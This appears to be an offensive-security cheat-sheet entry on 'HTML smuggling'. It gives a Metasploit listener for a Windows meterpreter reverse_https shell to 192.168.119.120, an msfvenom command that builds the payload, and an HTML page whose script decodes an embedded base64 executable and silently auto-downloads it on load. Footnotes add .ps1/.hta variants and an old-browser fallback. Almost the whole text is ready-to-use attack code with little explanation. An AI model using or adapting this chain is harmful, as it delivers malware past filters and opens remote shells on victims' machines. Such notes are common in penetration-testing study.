# HTML Smuggling: Auto Download
{% code title="listener:" %}
```bash
sudo msfconsole -q -x "use exploit/multi/handler"
set payload windows/x64/meterpreter/reverse_https
set lhost 192.168.119.120
set lport 443
run
```
{% endcode %}
{% code title="shell.exe to embed in html:" overflow="wrap" fullWidth="true" %}
```
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 -f exe -o /var/www/html/msfstaged.exe
```
{% endcode %}
base64 /var/www/html/msfstaged.exe
<html>
<body>
<script>
function base64ToArrayBuffer(base64) {
var binary_string = window.atob(base64);
var len = binary_string.length;
var bytes = new Uint8Array( len );
for (var i = 0; i < len; i++) { bytes[i] = binary_string.charCodeAt(i); }
return bytes.buffer;
}
var file ='TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAA...'
var data = base64ToArrayBuffer(file);
var blob = new Blob([data], {type: 'octet/stream'});
var fileName = 'msfstaged.exe';
var a = document.createElement('a');
document.body.appendChild(a);
a.style = 'display: none';
var url = window.URL.createObjectURL(blob);
a.href = url;
a.download = fileName;
a.click();
window.URL.revokeObjectURL(url);
</script>
</body>
</html>
```bash
sudo service apache2 start
```
[^1]: `var file ='TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAA...'`
[^2]: `base64 /var/www/html/msfstaged.exe`
[^3]: or `.ps1`, `.hta`
[^4]: for IE/old Edge:
`window.navigator.msSaveBlob(blob);`
simulates a file located on server but instead read from memory